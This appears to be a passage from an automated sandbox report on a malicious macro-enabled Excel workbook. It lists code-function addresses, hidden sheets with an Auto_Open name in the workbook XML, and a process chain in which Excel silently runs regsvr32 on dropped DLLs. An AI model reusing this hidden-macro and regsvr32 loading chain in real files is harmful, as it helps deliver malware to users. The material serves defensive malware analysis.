Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DE63C	3_2_003DE63C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D2606	3_2_003D2606
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003E06E7	3_2_003E06E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D46DD	3_2_003D46DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D86C1	3_2_003D86C1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CC7B4	3_2_003CC7B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003E0887	3_2_003E0887
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D4930	3_2_003D4930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C4949	3_2_003C4949
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C89F6	3_2_003C89F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DA9EE	3_2_003DA9EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D0A27	3_2_003D0A27
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003E0A1E	3_2_003E0A1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CEA8C	3_2_003CEA8C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D6B98	3_2_003D6B98
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D0B84	3_2_003D0B84
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CEC5D	3_2_003CEC5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D2CAC	3_2_003D2CAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C4D13	3_2_003C4D13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C4E03	3_2_003C4E03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C2E8C	3_2_003C2E8C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D8EF4	3_2_003D8EF4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DEECF	3_2_003DEECF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C6F64	3_2_003C6F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CAF67	3_2_003CAF67
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DAFB1	3_2_003DAFB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D0F87	3_2_003D0F87
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CD0F7	3_2_003CD0F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DB1BA	3_2_003DB1BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C51B7	3_2_003C51B7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D51F0	3_2_003D51F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C323D	3_2_003C323D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D92F0	3_2_003D92F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C7336	3_2_003C7336
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C53F6	3_2_003C53F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C9400	3_2_003C9400
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DF571	3_2_003DF571
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D75E7	3_2_003D75E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DB605	3_2_003DB605
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DF6AE	3_2_003DF6AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C5717	3_2_003C5717
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CB7B5	3_2_003CB7B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CF88D	3_2_003CF88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CD933	3_2_003CD933
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C192C	3_2_003C192C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C7AB6	3_2_003C7AB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CDAE6	3_2_003CDAE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C1B3F	3_2_003C1B3F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C9B4C	3_2_003C9B4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C9C3D	3_2_003C9C3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DDC64	3_2_003DDC64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D7CA5	3_2_003D7CA5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D1DCF	3_2_003D1DCF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003D3E98	3_2_003D3E98
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CFEF2	3_2_003CFEF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003CBF6E	3_2_003CBF6E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DFF4A	3_2_003DFF4A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003C5FA3	3_2_003C5FA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_003DDFCE	3_2_003DDFCE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00247A53	4_2_00247A53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00235AC9	4_2_00235AC9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00238ED3	4_2_00238ED3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024FADC	4_2_0024FADC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024E978	4_2_0024E978
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00233F40	4_2_00233F40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023DF44	4_2_0023DF44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00240552	4_2_00240552
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023B1A1	4_2_0023B1A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00248BA1	4_2_00248BA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002439B8	4_2_002439B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002325E7	4_2_002325E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002431D5	4_2_002431D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00240A27	4_2_00240A27
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024E63C	4_2_0024E63C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00239C3D	4_2_00239C3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023323D	4_2_0023323D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00234E03	4_2_00234E03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024B605	4_2_0024B605
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00242606	4_2_00242606
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00239400	4_2_00239400
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00250A1E	4_2_00250A1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024C064	4_2_0024C064
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024DC64	4_2_0024DC64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024A455	4_2_0024A455
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00232050	4_2_00232050
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023EC5D	4_2_0023EC5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00247CA5	4_2_00247CA5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002444A7	4_2_002444A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00242CAC	4_2_00242CAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024F6AE	4_2_0024F6AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00237AB6	4_2_00237AB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002362BA	4_2_002362BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00250887	4_2_00250887
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023F88D	4_2_0023F88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00232E8C	4_2_00232E8C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023EA8C	4_2_0023EA8C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00234497	4_2_00234497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00243E98	4_2_00243E98
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024609A	4_2_0024609A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023E4E2	4_2_0023E4E2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002506E7	4_2_002506E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024E2E1	4_2_0024E2E1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023DAE6	4_2_0023DAE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024E4E3	4_2_0024E4E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00248EF4	4_2_00248EF4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023FEF2	4_2_0023FEF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023D0F7	4_2_0023D0F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002492F0	4_2_002492F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002486C1	4_2_002486C1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024EECF	4_2_0024EECF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002446DD	4_2_002446DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023192C	4_2_0023192C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023D933	4_2_0023D933
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00244930	4_2_00244930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00237336	4_2_00237336
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00231B3F	4_2_00231B3F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00234D13	4_2_00234D13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00235717	4_2_00235717
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023AF67	4_2_0023AF67
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00236F64	4_2_00236F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023BF6E	4_2_0023BF6E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024F571	4_2_0024F571
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00234949	4_2_00234949
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024FF4A	4_2_0024FF4A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00239B4C	4_2_00239B4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023C14C	4_2_0023C14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024815D	4_2_0024815D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00235FA3	4_2_00235FA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002351B7	4_2_002351B7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024A1B1	4_2_0024A1B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024AFB1	4_2_0024AFB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023B7B5	4_2_0023B7B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023C7B4	4_2_0023C7B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024B1BA	4_2_0024B1BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00240B84	4_2_00240B84
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00240F87	4_2_00240F87
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023C388	4_2_0023C388
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00246B98	4_2_00246B98
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024C5E5	4_2_0024C5E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002475E7	4_2_002475E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024A9EE	4_2_0024A9EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002451F0	4_2_002451F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002353F6	4_2_002353F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002389F6	4_2_002389F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024DFCE	4_2_0024DFCE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00241DCF	4_2_00241DCF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040EC5D	5_2_0040EC5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041C064	5_2_0041C064
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00420A1E	5_2_00420A1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041E63C	5_2_0041E63C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00409C3D	5_2_00409C3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00405AC9	5_2_00405AC9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041EECF	5_2_0041EECF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00408ED3	5_2_00408ED3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040E4E2	5_2_0040E4E2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040FEF2	5_2_0040FEF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00402E8C	5_2_00402E8C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041609A	5_2_0041609A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00412CAC	5_2_00412CAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040C14C	5_2_0040C14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041E978	5_2_0041E978
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00407336	5_2_00407336
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041C5E5	5_2_0041C5E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004025E7	5_2_004025E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004151F0	5_2_004151F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00410B84	5_2_00410B84
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00410F87	5_2_00410F87
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00416B98	5_2_00416B98
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041AFB1	5_2_0041AFB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040B7B5	5_2_0040B7B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004051B7	5_2_004051B7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00402050	5_2_00402050
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00417A53	5_2_00417A53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041A455	5_2_0041A455
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041DC64	5_2_0041DC64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00409400	5_2_00409400
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00404E03	5_2_00404E03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041B605	5_2_0041B605
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00412606	5_2_00412606
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00410A27	5_2_00410A27
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040323D	5_2_0040323D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004186C1	5_2_004186C1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004146DD	5_2_004146DD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041FADC	5_2_0041FADC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041E2E1	5_2_0041E2E1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041E4E3	5_2_0041E4E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004206E7	5_2_004206E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040DAE6	5_2_0040DAE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004192F0	5_2_004192F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00418EF4	5_2_00418EF4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040D0F7	5_2_0040D0F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00420887	5_2_00420887
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040EA8C	5_2_0040EA8C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040F88D	5_2_0040F88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00404497	5_2_00404497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00413E98	5_2_00413E98
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00417CA5	5_2_00417CA5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004144A7	5_2_004144A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041F6AE	5_2_0041F6AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00407AB6	5_2_00407AB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004062BA	5_2_004062BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00403F40	5_2_00403F40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040DF44	5_2_0040DF44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00404949	5_2_00404949
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041FF4A	5_2_0041FF4A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00409B4C	5_2_00409B4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00410552	5_2_00410552
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041815D	5_2_0041815D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00406F64	5_2_00406F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040AF67	5_2_0040AF67
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040BF6E	5_2_0040BF6E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041F571	5_2_0041F571
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00404D13	5_2_00404D13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00405717	5_2_00405717
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040192C	5_2_0040192C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00414930	5_2_00414930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040D933	5_2_0040D933
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00401B3F	5_2_00401B3F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00411DCF	5_2_00411DCF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041DFCE	5_2_0041DFCE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004131D5	5_2_004131D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004175E7	5_2_004175E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041A9EE	5_2_0041A9EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004053F6	5_2_004053F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004089F6	5_2_004089F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040C388	5_2_0040C388
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00418BA1	5_2_00418BA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040B1A1	5_2_0040B1A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_00405FA3	5_2_00405FA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041A1B1	5_2_0041A1B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0040C7B4	5_2_0040C7B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004139B8	5_2_004139B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_0041B1BA	5_2_0041B1BA

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: String function: 1001A9E0 appears 189 times

Source: qd_34768.xlsm	Macro extractor: Sheet name: PIMKE
Source: qd_34768.xlsm	Macro extractor: Sheet name: PIMKE

Source: eVzUZ7dv5zBAXa5[1].dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eVzUZ7dv5zBAXa5[1].dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xewn.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xewn.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: workbook.xml

Binary string: (2)\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F5AAA563-2BE5-4D04-A527-156FA41B3CA2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Odjfs" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Dghdb" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Vghsg" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Urgds" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Njkg" sheetId="6" state="hidden" r:id="rId6"/><sheet name="PIMKE" sheetId="7" state="hidden" r:id="rId7"/></sheets><definedNames><definedName name="IVFB1">PIMKE!$C$14</definedName><definedName name="IVFB2">PIMKE!$C$16</definedName><definedName name="IVFB3">PIMKE!$C$18</definedName><definedName name="IVFB4">PIMKE!$C$20</definedName><definedName name="IVFB5">PIMKE!$C$22</definedName><definedName name="IVFB6">PIMKE!$C$24</definedName><definedName name="IVFB7">PIMKE!$C$26</definedName><definedName name="_xlnm.Auto_Open567980">PIMKE!$C$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:Single"/><xcalcf:feature name="microsoft.com:FV"/><xcalcf:feature name="microsoft.com:CNMTM"/><xcalcf:feature name="microsoft.com:LET_WF"/><xcalcf:feature name="microsoft.com:LAMBDA_WF"/></xcalcf:calcFeatures></ext></extLst></workbook>

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: qd_34768.xlsm

ReversingLabs: Detection: 40%

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$qd_34768.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR229C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@7/9@1/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1001741F __EH_prolog,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,

3_2_1001741F

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_0040F7F9 CreateToolhelp32Snapshot,

5_2_0040F7F9

Source: C:\Windows\SysWOW64\regsvr32.exe
